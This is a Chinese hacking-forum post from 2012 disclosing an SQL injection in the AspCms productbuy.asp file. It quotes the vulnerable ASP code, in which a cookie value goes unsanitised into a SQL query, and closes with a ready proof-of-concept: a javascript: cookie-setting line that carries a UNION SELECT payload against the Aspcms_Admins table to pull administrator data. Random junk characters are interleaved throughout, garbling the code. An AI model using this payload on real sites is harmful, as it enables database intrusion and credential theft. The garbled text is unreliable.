好久没上土司了,上来一看发现在删号名单内.....
4 `, I' v3 e9 w6 ^, R也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
- Y8 d5 y. s5 U4 T废话不多说,看代码:$ t$ { ]8 b9 h4 @7 K& m6 K
1 k6 K- O0 y, o; [# I<%( }; H0 C& ]4 u+ d4 r: e
3 {. P( ~5 t, N( w
if action = "buy" then
7 S! u. S5 F( m8 j( v) \" E9 _( |) }( b
addOrder()
6 ^3 a- ~$ O& X
; w5 r1 r( i( b/ S+ ]1 q$ Zelse& M5 S$ Y; K$ D
9 B! l2 D: [6 N) [- T
echoContent(): n) v/ |! R7 }6 _" P; e# d
( ?, c/ h0 v/ j. c5 f
end if
6 W H: E' o$ d7 C1 M9 z) G1 o" V
1 D M9 E) D6 ?9 Y) v* k: w
8 s- T. Z i; d4 l7 W5 R% k
7 ^. c. Q) K7 Z1 j# [! m' _……略过
4 ]# |8 r* }. C6 z, F) T" y8 ~2 P4 z& d8 Z1 O
_7 x7 \9 F n- p; w; H
& o! K! ~8 u& X$ s/ S0 TSub echoContent()
2 U8 S! E, G( \, R a' i. k- B9 c2 r5 R% A+ {
dim id
( p7 f5 ^5 r0 l2 b" P$ t: N) E& a% A$ A0 E, r7 q' l
id=getForm("id","get"); z0 e: n. v, a
* @5 N- G! x+ D0 B- b! t
* C* Z4 g1 C1 u6 j$ l
; L' ]; W1 ^1 ]: Y3 ~0 ?/ ^ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" ; Z& H' n: D) @& P& I( I8 k) Q4 w l
9 S: X; O( [6 a" g$ |& a
) B. e1 A! t, X% V J3 X- s
9 D: y7 d% J) o5 P0 g. ]
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
: T/ ?5 B( X2 G) H/ l( G0 N$ w7 x/ S
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
2 K# J7 y! X' T7 P m7 g) E; o: @# \) `+ G+ B8 n% u
Dim templatePath,tempStr
1 \4 ]7 E/ v+ }& r5 V6 y3 `6 G0 ]. w4 K
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"6 a5 _1 L, b* ~$ v. \
}' _0 E( D" Z# _. y% Y) {) n; T
& p2 J# l, H$ W% h9 v7 t9 k& B5 J. r$ Q9 N- Q7 X) l6 i- D
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
7 _6 O. K* |4 v( T. V+ e# u/ {
4 W. D2 \; r! p/ v9 a selectproduct=rsObj(0)$ u s% R. [& @ v
. n0 E; x1 m9 E
0 r; P4 K5 Y6 F% a- J
+ X( O7 j! @! Z8 U5 o* Z5 y Dim linkman,gender,phone,mobile,email,qq,address,postcode+ Y( ?' f4 i. a# \7 a
% k+ ^5 j. V4 m( B' o8 }0 G if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
& w: ]9 G4 b( n
/ B7 V8 Y0 c1 W# R& ^ if rCookie("loginstatus")=1 then
% @! A9 j0 F! T$ P6 N$ Q/ A& C; _& k* O' p2 e; {9 ^
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
8 T2 Y% I2 z e
; ^& K; T0 b' B linkman=rsObj("truename")( l9 l% ~* Q, }4 k
4 I2 k* G3 f ~& X. u0 V
gender=rsObj("gender")
9 c; p) u. O7 z2 a1 U
/ z: C4 D2 g( I0 z4 p2 g phone=rsObj("phone")5 q& l4 u+ y7 [) R% w# x! i
3 M4 y( B1 t5 N( u8 q& w2 y mobile=rsObj("mobile")
# u U0 w1 D/ j/ c0 E5 z4 W+ ]$ m0 Z, A9 C/ \
email=rsObj("email")' V% _8 c2 `! J4 q
/ _! K- m2 B. L; } qq=rsObj("qq")& Z/ N. d7 D. E- E
% x1 u! j9 X5 k6 @9 ~+ H address=rsObj("address")
2 c, a/ i( w b% ~' g) C2 u& [* Q0 o. \3 B3 p
postcode=rsObj("postcode")5 g" a* l+ O' B* j# I4 B
! B9 Y% Y7 H+ i6 Y
else 7 c# w4 {( a0 c d( g8 i; }
8 s2 ?% C! \1 x& O5 k gender=19 H4 y# y `, L2 N. p
8 v3 @9 t" r) k p! N( e end if F+ I3 O. `/ o6 H. o
. f3 a u- [3 K( ^9 R
rsObj.close()
+ r9 j' @! y% U6 u7 q) h: u
b3 i! g9 l% K. G- F
" e/ }5 h W- p; V4 K
; c" W8 S- S* }9 e with templateObj 8 s$ T. i5 r, z" @! @0 r$ q
g4 E3 s2 P# e2 ]+ o0 [% I .content=loadFile(templatePath)
0 z6 p D; t" \% X3 a" R- Z6 ~) j4 H/ P$ F
.parseHtml()
# z* F% S5 e l! M! ^
- k9 O# g8 ^5 l) N, ^$ n0 h .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
9 I5 L9 O2 S. }, A9 Q5 J+ S
! p! R9 m3 [- N9 g .content=replaceStr(.content,"[aspcms:linkman]",linkman)
/ F. b8 R6 a7 H1 z- |9 c
+ p2 q" d% G n .content=replaceStr(.content,"[aspcms:gender]",gender) - u9 H. z3 Y9 j: P5 x
/ q" y% u& g0 T0 \
.content=replaceStr(.content,"[aspcms:phone]",phone) 7 |: o5 [) [( S5 V- i) k7 S4 {
6 d- u1 V6 N" x( E. M$ E$ o8 [' a .content=replaceStr(.content,"[aspcms:mobile]",mobile) ! ?+ R& L7 n; |
$ J/ j5 Z( i. H. r6 u7 y- c .content=replaceStr(.content,"[aspcms:email]",email) 2 J6 E/ x. | P; E
. R: L3 k4 g8 C# {7 l2 Q .content=replaceStr(.content,"[aspcms:qq]",qq)
1 k# m/ U4 x, z. E ^. f) s. d6 n m( L/ j3 B) `# d9 ^2 L, f$ z# B
.content=replaceStr(.content,"[aspcms:address]",address)
: h7 Q y, Q7 O+ f$ I$ ]8 ~2 [" N U/ F" ~4 |
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
% _, d3 N! F7 N* x' C2 b
: G7 K4 D; D9 o% J1 [0 c .parseCommon()
, T; O! _7 o8 w( p7 O9 T. S1 w! p5 i- l0 Z1 p+ ~
echo .content % h B3 S" c" @) |0 w
- }+ b0 L+ k) M8 B/ r2 b
end with1 a$ K5 v# N7 q) R) B' E* m7 ~, V
7 H$ ]1 U: d0 ~" v, S# [1 d ^ set templateobj =nothing : terminateAllObjects% m! z8 R3 x# h
$ [1 y/ y6 Z6 a Q7 i/ `& D; \End Sub' p. s8 ^ H9 ~& k# q
漏洞很明显,没啥好说的# {3 _& V$ `3 H% P1 ]$ w
poc:# K% i9 R4 n Q; U3 }. g9 _5 r8 C
7 C5 g7 u5 g \/ d, x3 g4 x2 ~javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
: a, o3 X6 [2 a
' k, w8 u$ K( E' K* o- Q4 R |
发表于 2012-12-27 08:35:05
收藏
支持
反对